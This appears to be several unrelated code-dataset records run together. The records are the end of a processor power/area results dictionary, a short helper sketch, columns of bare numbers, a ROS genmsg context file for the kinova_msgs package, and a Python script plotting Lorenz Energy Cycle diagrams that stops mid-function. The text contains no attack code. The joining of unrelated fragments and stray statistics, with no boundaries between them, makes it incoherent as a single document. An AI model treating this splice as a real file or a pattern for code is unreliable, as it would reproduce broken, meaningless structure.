'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0565284,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.59569,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.13911,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.191996,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.98871,
'Instruction Fetch Unit/Runtime Dynamic': 0.388743,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0399561,
'L2/Runtime Dynamic': 0.0110362,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.62214,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.15876,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0771611,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0771611,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.98651,
'Load Store Unit/Runtime Dynamic': 1.61645,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.190266,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.380532,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0675261,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.06811,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.223567,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0228527,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.495673,
'Memory Management Unit/Runtime Dynamic': 0.0909628,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 19.2042,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.309136,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0123145,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0907896,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.41224,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 4.48368,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 3.8126648077879777,
'Runtime Dynamic': 3.8126648077879777,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.203129,
'Runtime Dynamic': 0.0598429,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 82.0728,
'Peak Power': 115.185,
'Runtime Dynamic': 22.4326,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 81.8697,
'Total Cores/Runtime Dynamic': 22.3728,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.203129,
'Total L3s/Runtime Dynamic': 0.0598429,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
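A minimal sketch, not part of the data above: the dictionaries printed above (which look like McPAT-style power/area results, one dict per core plus DRAM/L3/Processor totals) key every metric by a slash-separated component path such as 'Execution Unit/Integer ALUs/Runtime Dynamic'. A small helper can turn one such flat dict into a nested tree for easier traversal; the helper name and the tiny example dict below are illustrative only.
def nest_power_dict(flat):
    """Convert {'A/B/Metric': value, ...} into {'A': {'B': {'Metric': value}}}.
    Assumes no key is both a leaf and a prefix of another key, which holds for
    the data shown above."""
    tree = {}
    for path, value in flat.items():
        parts = path.split('/')
        node = tree
        for part in parts[:-1]:
            node = node.setdefault(part, {})
        node[parts[-1]] = value
    return tree

# Tiny made-up subset of the keys shown above, just to illustrate the shape:
core = {
    'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
    'Execution Unit/Runtime Dynamic': 1.44594,
    'Runtime Dynamic': 2.95872,
}
print(nest_power_dict(core)['Execution Unit']['Integer ALUs']['Runtime Dynamic'])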
| 75.083151
| 124
| 0.682045
| 8,090
| 68,626
| 5.779728
| 0.067985
| 0.12353
| 0.112922
| 0.093417
| 0.938171
| 0.929574
| 0.91749
| 0.884961
| 0.860323
| 0.842316
| 0
| 0.131924
| 0.224274
| 68,626
| 914
| 125
| 75.083151
| 0.746407
| 0
| 0
| 0.642232
| 0
| 0
| 0.657249
| 0.048086
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
42c23e1d62ace450801f32c424bf3c5b9e10adee
| 5,061
|
py
|
Python
|
build/kinova-ros/kinova_msgs/cmake/kinova_msgs-genmsg-context.py
|
madalynlmillen/MadalynMillenCapstone
|
a1585ba419d4ab4854908b4ba88e4c8ca330b5cd
|
[
"MIT",
"Unlicense"
] | null | null | null |
build/kinova-ros/kinova_msgs/cmake/kinova_msgs-genmsg-context.py
|
madalynlmillen/MadalynMillenCapstone
|
a1585ba419d4ab4854908b4ba88e4c8ca330b5cd
|
[
"MIT",
"Unlicense"
] | null | null | null |
build/kinova-ros/kinova_msgs/cmake/kinova_msgs-genmsg-context.py
|
madalynlmillen/MadalynMillenCapstone
|
a1585ba419d4ab4854908b4ba88e4c8ca330b5cd
|
[
"MIT",
"Unlicense"
] | null | null | null |
# generated from genmsg/cmake/pkg-genmsg.context.in
messages_str = "/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/msg/FingerPosition.msg;/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/msg/JointAngles.msg;/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/msg/JointVelocity.msg;/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/msg/JointTorque.msg;/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/msg/KinovaPose.msg;/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/msg/PoseVelocity.msg;/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/msg/CartesianForce.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/ArmJointAnglesAction.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/ArmJointAnglesActionGoal.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/ArmJointAnglesActionResult.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/ArmJointAnglesActionFeedback.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/ArmJointAnglesGoal.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/ArmJointAnglesResult.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/ArmJointAnglesFeedback.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/ArmPoseAction.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/ArmPoseActionGoal.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/ArmPoseActionResult.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/ArmPoseActionFeedback.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/ArmPoseGoal.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/ArmPoseResult.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/ArmPoseFeedback.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/Arm_KinovaPoseAction.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/Arm_KinovaPoseActionGoal.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/Arm_KinovaPoseActionResult.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/Arm_KinovaPoseActionFeedback.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/Arm_KinovaPoseGoal.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/Arm_KinovaPoseResult.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/Arm_KinovaPoseFeedback.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/SetFingersPositionAction.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/SetFingersPositionActionGoal.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/SetFingersPositionActionResult.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/SetFingersPositionActionFeedback.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/SetFingersPositionGoal.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/SetFingersPositionResult.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/SetFingersPositionFeedback.msg"
services_str = "/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/srv/Start.srv;/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/srv/Stop.srv;/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/srv/HomeArm.srv;/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/srv/SetForceControlParams.srv;/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/srv/SetEndEffectorOffset.srv;/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/srv/SetNullSpaceModeState.srv;/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/srv/SetTorqueControlMode.srv;/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/srv/SetTorqueControlParameters.srv;/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/srv/ClearTrajectories.srv;/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/srv/ZeroTorques.srv;/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/srv/AddPoseToCartesianTrajectory.srv;/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/srv/RunCOMParametersEstimation.srv"
pkg_name = "kinova_msgs"
dependencies_str = "actionlib_msgs;geometry_msgs"
langs = "gencpp;geneus;genlisp;gennodejs;genpy"
dep_include_paths_str = "kinova_msgs;/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/msg;kinova_msgs;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg;actionlib_msgs;/opt/ros/kinetic/share/actionlib_msgs/cmake/../msg;geometry_msgs;/opt/ros/kinetic/share/geometry_msgs/cmake/../msg;std_msgs;/opt/ros/kinetic/share/std_msgs/cmake/../msg"
PYTHON_EXECUTABLE = "/usr/bin/python"
package_has_static_sources = '' == 'TRUE'
genmsg_check_deps_script = "/opt/ros/kinetic/share/genmsg/cmake/../../../lib/genmsg/genmsg_check_deps.py"
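A brief sketch, not generated by genmsg: the semicolon-separated strings defined above can be split into plain Python lists when inspecting the message and service files by hand. The split_paths helper below is hypothetical and assumes the messages_str / services_str variables defined above are in scope.
import os

def split_paths(semicolon_str):
    """Split a genmsg-style ';'-separated path string into a list of paths."""
    return [p for p in semicolon_str.split(';') if p]

msg_files = split_paths(messages_str)
srv_files = split_paths(services_str)
print(len(msg_files), 'message files,', len(srv_files), 'service files')
print(sorted(os.path.basename(p) for p in srv_files)[:3])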
| 421.75
| 3,218
| 0.864058
| 703
| 5,061
| 6.032717
| 0.142248
| 0.122613
| 0.277293
| 0.346616
| 0.703372
| 0.687809
| 0.687809
| 0.683094
| 0.683094
| 0.683094
| 0
| 0
| 0.006718
| 5,061
| 11
| 3,219
| 460.090909
| 0.843644
| 0.009682
| 0
| 0
| 1
| 0.333333
| 0.959481
| 0.953493
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
42c45984a475d4bf6db8adbb57565c28ec003479
| 15,190
|
py
|
Python
|
src/py/LEC-paper-boxplots.py
|
AJueling/LEC
|
f720aa8cec147d8f9acab00c1d1de3bd8fc40b6e
|
[
"BSD-3-Clause"
] | 1
|
2021-10-05T12:45:58.000Z
|
2021-10-05T12:45:58.000Z
|
src/py/LEC-paper-boxplots.py
|
AJueling/LEC
|
f720aa8cec147d8f9acab00c1d1de3bd8fc40b6e
|
[
"BSD-3-Clause"
] | null | null | null |
src/py/LEC-paper-boxplots.py
|
AJueling/LEC
|
f720aa8cec147d8f9acab00c1d1de3bd8fc40b6e
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
import pandas as pd
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
import matplotlib.ticker as mticker
from matplotlib.collections import PatchCollection
from read_output import LEC_global, analyze_LEC
def LEC4_overview(df, name, letter):
"""
creates a Lorenz Energy Cycle plot with reservoir, generation, exchange, and dissipation terms
"""
fig, ax = plt.subplots(figsize=(10,10))
ax.set_aspect('equal')
ax.set_ylim((0,5))
ax.set_xlim((0,5))
grid = np.mgrid[0.5:4.5:5j, 0.5:4.5:5j].reshape(2, -1).T
patches1, patches2 = [], []
pos = [8, 6, 18, 16, 3, 1, 23, 21, 7, 17, 13, 11, 9, 5, 19, 15]
titles = ['mean\npotential\nenergy','eddy\npotential\nenergy','mean\nkinetic\nenergy','eddy\nkinetic\nenergy',\
"G(P$_m$)","G(P$_e$)","G(K$_m$)","G(K$_e$)",\
"C(P$_e$,P$_m$)","C(K$_e$,K$_m$)","C(P$_m$,K$_m$)","C(P$_e$,K$_e$)",\
"D(P$_m$)","D(P$_e$)","D(K$_m$)","D(K$_e$)"]
POP = [df['rPm'].mean() ,df['rPe'].mean() ,df['rKm'].mean() ,df['rKe'].mean(),\
df['gPm'].mean() ,df['gPe'].mean() ,df['gKm'].mean() ,df['gKe'].mean(),\
df['cPem'].mean(),df['cKem'].mean(),df['cPKm'].mean(),df['cPKe'].mean(),\
df['dPm'].mean() ,df['dPe'].mean() ,df['dKm'].mean() ,df['dKe'].mean()]
POP_var = [df['rPm'].std() ,df['rPe'].std() ,df['rKm'].std() ,df['rKe'].std(),\
df['gPm'].std() ,df['gPe'].std() ,df['gKm'].std() ,df['gKe'].std(),\
df['cPem'].std() ,df['cKem'].std() ,df['cPKm'].std() ,df['cPKe'].std(),\
df['dPm'].std() ,df['dPe'].std() ,df['dKm'].std() ,df['dKe'].std()]
total = df['gPm'].mean() + df['gPe'].mean() + df['gKm'].mean() + df['gKe'].mean()
color_values2 = []
rarrow_list = []
larrow_list = []
darrow_list = []
uarrow_list = []
ax.text(grid[4][0]-.45,grid[4][1]+.25,f'{letter}) {name}',fontsize=24,ha='left')
for i in [4,5,10,11]: #rarrow_list
if POP[i]>=0.0:
rarrow_list.append(i)
else:
larrow_list.append(i)
for i in [6,7]: #rarrow_list
if POP[i]>=0.0:
larrow_list.append(i)
else:
rarrow_list.append(i)
for i in [8,9,12,14]: #uarrow_list
if POP[i]>=0.0:
uarrow_list.append(i)
else:
darrow_list.append(i)
for i in [13,15]: #darrow_list
if POP[i]>=0.0:
darrow_list.append(i)
else:
uarrow_list.append(i)
for i in range(len(pos)):
if i<4:
rect = mpatches.FancyBboxPatch(grid[pos[i]] - [0.375, 0.375], 0.75, 0.75,\
boxstyle=mpatches.BoxStyle("Round", pad=0.1))
if i in rarrow_list:
arrw = mpatches.FancyArrow(x=grid[pos[i]][0]-.47, y=grid[pos[i]][1], dx=.94,dy=0.0,\
width=0.7,head_width=0.9,head_length=0.2,length_includes_head=True)
if i in larrow_list:
arrw = mpatches.FancyArrow(x=grid[pos[i]][0]+.47, y=grid[pos[i]][1], dx=-.94,dy=0.0,\
width=0.7,head_width=0.9,head_length=0.2,length_includes_head=True)
if i in darrow_list:
arrw = mpatches.FancyArrow(x=grid[pos[i]][0], y=grid[pos[i]][1]+.47, dx=0.,dy=-.94,\
width=0.7,head_width=0.9,head_length=0.2,length_includes_head=True)
if i in uarrow_list:
arrw = mpatches.FancyArrow(x=grid[pos[i]][0], y=grid[pos[i]][1]-.47, dx=0.,dy=.94,\
width=0.7,head_width=0.9,head_length=0.2,length_includes_head=True)
if i<4: # energy reservoirs
plt.text(grid[pos[i]][0], grid[pos[i]][1]+0.2, titles[i],\
ha="center",va="center", family='sans-serif', size=16,weight='bold')
plt.text(grid[pos[i]][0], grid[pos[i]][1]-0.14, "{:4.1f}".format(POP[i]/1e18)+' EJ',\
ha="center",va="center", family='sans-serif', size=16)
plt.text(grid[pos[i]][0], grid[pos[i]][1]-.3, "$\pm${:3.2f}".format(POP_var[i]/1e18)+' EJ',\
ha="center",va="center", family='sans-serif', size=16)
patches1.append(rect)
elif i>=4: # power transfer terms
if i in larrow_list: a,b = .08, 0.
elif i in rarrow_list: a,b = -.08, 0.
elif i in uarrow_list: a,b = 0. , -.08
elif i in darrow_list: a,b = 0. , .08
plt.text(grid[pos[i]][0]+a, grid[pos[i]][1]+0.24+b, titles[i],\
ha="center",va="center", family='sans-serif', size=16,weight='bold')
plt.text(grid[pos[i]][0]+a, grid[pos[i]][1]+0.08+b, "({:4.1f}".format(abs(POP[i]/total)*100.0)+' %)',\
ha="center",va="center", family='sans-serif', size=14)
plt.text(grid[pos[i]][0]+a, grid[pos[i]][1]-0.08+b, "{:4.2f}".format(POP[i]/1e12)+' TW',\
ha="center",va="center", family='sans-serif', size=16)
plt.text(grid[pos[i]][0]+a, grid[pos[i]][1]-0.24+b, "$\pm${:2.0f}".format(abs(POP_var[i])/1e9)+' GW',\
ha="center",va="center", family='sans-serif', size=16)
patches2.append(arrw)
color_values2.append(abs(POP[i]))
collection1 = PatchCollection(patches1, color='CornflowerBlue', alpha=.6)
ax.add_collection(collection1)
collection2 = PatchCollection(patches2, cmap='autumn', alpha=.7)
collection2.set_array(np.array(-np.array(color_values2)))
ax.add_collection(collection2)
plt.axis('off')
plt.savefig('../../results/SOM_paper/LEC4_overview_'+name+'.png',bbox_inches='tight',dpi=100, author='Andre Jueling')
plt.savefig('../../results/SOM_paper/LEC4_overview_'+name+'.eps',bbox_inches='tight',format='eps', author='Andre Jueling')
plt.savefig('../../results/SOM_paper/LEC4_overview_'+name+'.pdf',bbox_inches='tight',format='pdf', author='Andre Jueling')
def LEC4_BT_overview(df, name, letter):
"""
same as LEC4_overview above, but with the Km boundary term B(Km) included
df contains 'df_SO30' and 'budget' dataframes
"""
fig, ax = plt.subplots(figsize=(10,10))
ax.set_aspect('equal')
ax.set_ylim((0,5))
ax.set_xlim((0,5))
grid = np.mgrid[0.5:4.5:5j, 0.5:4.5:5j].reshape(2, -1).T
patches1, patches2 = [], []
pos = [8, 6, 18, 16, 3, 1, 23, 21, 7, 17, 13, 11, 9, 5, 19, 15, 24]
titles = ['mean\npotential\nenergy','eddy\npotential\nenergy','mean\nkinetic\nenergy','eddy\nkinetic\nenergy',\
"G(P$_m$)","G(P$_e$)","G(K$_m$)","G(K$_e$)",\
"C(P$_e$,P$_m$)","C(K$_e$,K$_m$)","C(P$_m$,K$_m$)","C(P$_e$,K$_e$)",\
"D/B(P$_m$)","D/B(P$_e$)","D(K$_m$)","D/B(K$_e$)",\
"B(K$_m$)"]
POP = [df['rPm'].mean() ,df['rPe'].mean() ,df['rKm'].mean() ,df['rKe'].mean(), \
df['gPm'].mean() ,df['gPe'].mean() ,df['gKm'].mean() ,df['gKe'].mean(), \
df['cPem'].mean(),df['cKem'].mean(),df['cPKm'].mean() ,df['cPKe'].mean(),\
df['dPm'].mean() ,df['dPe'].mean() ,df['dKm_mbt'].mean() ,df['dKe'].mean(), \
df['bKm'].mean() ]
POP_var = [df['rPm'].std() ,df['rPe'].std() ,df['rKm'].std() ,df['rKe'].std(), \
df['gPm'].std() ,df['gPe'].std() ,df['gKm'].std() ,df['gKe'].std(), \
df['cPem'].std() ,df['cKem'].std() ,df['cPKm'].std() ,df['cPKe'].std(), \
df['dPm'].std() ,df['dPe'].std() ,df['dKm_mbt'].std() ,df['dKe'].std(), \
df['bKm'].std() ]
total = df['gPm'].mean() + df['gPe'].mean() + df['gKm'].mean() + df['gKe'].mean()
color_values2 = []
rarrow_list = []
larrow_list = []
darrow_list = []
uarrow_list = []
barrow_list = [16]
ax.text(grid[4][0]-.45,grid[4][1]+.25,f'{letter}) {name}',fontsize=24,ha='left')
for i in [4,5,10,11]: #rarrow_list
if POP[i]>=0.0:
rarrow_list.append(i)
else:
larrow_list.append(i)
for i in [6,7]: #rarrow_list
if POP[i]>=0.0:
larrow_list.append(i)
else:
rarrow_list.append(i)
for i in [8,9,12,14]: #uarrow_list
if POP[i]>=0.0:
uarrow_list.append(i)
else:
darrow_list.append(i)
for i in [13,15]: #darrow_list
if POP[i]>=0.0:
darrow_list.append(i)
else:
uarrow_list.append(i)
for i in range(len(pos)):
if i<4:
rect = mpatches.FancyBboxPatch(grid[pos[i]] - [0.375, 0.375], 0.75, 0.75,\
boxstyle=mpatches.BoxStyle("Round", pad=0.1))
if i in rarrow_list:
arrw = mpatches.FancyArrow(x=grid[pos[i]][0]-.47, y=grid[pos[i]][1], dx=.94,dy=0.0,\
width=0.7,head_width=0.9,head_length=0.2,length_includes_head=True)
if i in larrow_list:
arrw = mpatches.FancyArrow(x=grid[pos[i]][0]+.47, y=grid[pos[i]][1], dx=-.94,dy=0.0,\
width=0.7,head_width=0.9,head_length=0.2,length_includes_head=True)
if i in darrow_list:
arrw = mpatches.FancyArrow(x=grid[pos[i]][0], y=grid[pos[i]][1]+.47, dx=0.,dy=-.94,\
width=0.7,head_width=0.9,head_length=0.2,length_includes_head=True)
if i in uarrow_list:
arrw = mpatches.FancyArrow(x=grid[pos[i]][0], y=grid[pos[i]][1]-.47, dx=0.,dy=.94,\
width=0.7,head_width=0.9,head_length=0.2,length_includes_head=True)
if i in barrow_list:
arrw = mpatches.FancyArrow(x=grid[pos[i]][0]-.35, y=grid[pos[i]][1]-.35, dx=0.65,dy=0.65,\
width=0.7,head_width=0.9,head_length=0.2,length_includes_head=True)
if i<4: # energy reservoirs
plt.text(grid[pos[i]][0], grid[pos[i]][1]+0.2, titles[i],\
ha="center",va="center", family='sans-serif', size=16,weight='bold')
if POP[i]>1e18:
plt.text(grid[pos[i]][0], grid[pos[i]][1]-0.14, "{:4.1f}".format(POP[i]/1e18)+' EJ',\
ha="center",va="center", family='sans-serif', size=16)
plt.text(grid[pos[i]][0], grid[pos[i]][1]-.3, "$\pm${:3.1f}".format(POP_var[i]/1e18)+' EJ',\
ha="center",va="center", family='sans-serif', size=16)
patches1.append(rect)
elif POP[i]<1e18 and POP[i]>1e15:
plt.text(grid[pos[i]][0], grid[pos[i]][1]-0.14, "{:4.1f}".format(POP[i]/1e15)+' PJ',\
ha="center",va="center", family='sans-serif', size=16)
plt.text(grid[pos[i]][0], grid[pos[i]][1]-.3, "$\pm${:3.1f}".format(POP_var[i]/1e15)+' PJ',\
ha="center",va="center", family='sans-serif', size=16)
patches1.append(rect)
elif POP[i]<1e15 and POP[i]>1e12:
plt.text(grid[pos[i]][0], grid[pos[i]][1]-0.14, "{:4.1f}".format(POP[i]/1e12)+' TJ',\
ha="center",va="center", family='sans-serif', size=16)
plt.text(grid[pos[i]][0], grid[pos[i]][1]-.3, "$\pm${:3.1f}".format(POP_var[i]/1e12)+' TJ',\
ha="center",va="center", family='sans-serif', size=16)
patches1.append(rect)
elif i>=4:
if i<16: # power transfer terms
if i in larrow_list: a,b = .08, 0.
elif i in rarrow_list: a,b = -.08, 0.
elif i in uarrow_list: a,b = 0. , -.08
elif i in darrow_list: a,b = 0. , .08
plt.text(grid[pos[i]][0]+a, grid[pos[i]][1]+0.24+b, titles[i],\
ha="center",va="center", family='sans-serif', size=16,weight='bold')
plt.text(grid[pos[i]][0]+a, grid[pos[i]][1]+0.08+b, "({:4.1f}".format(abs(POP[i]/total)*100.0)+' %)',\
ha="center",va="center", family='sans-serif', size=14)
plt.text(grid[pos[i]][0]+a, grid[pos[i]][1]-0.08+b, "{:4.0f}".format(POP[i]/1e09)+' GW',\
ha="center",va="center", family='sans-serif', size=16)
if POP_var[i]/1e9>1:
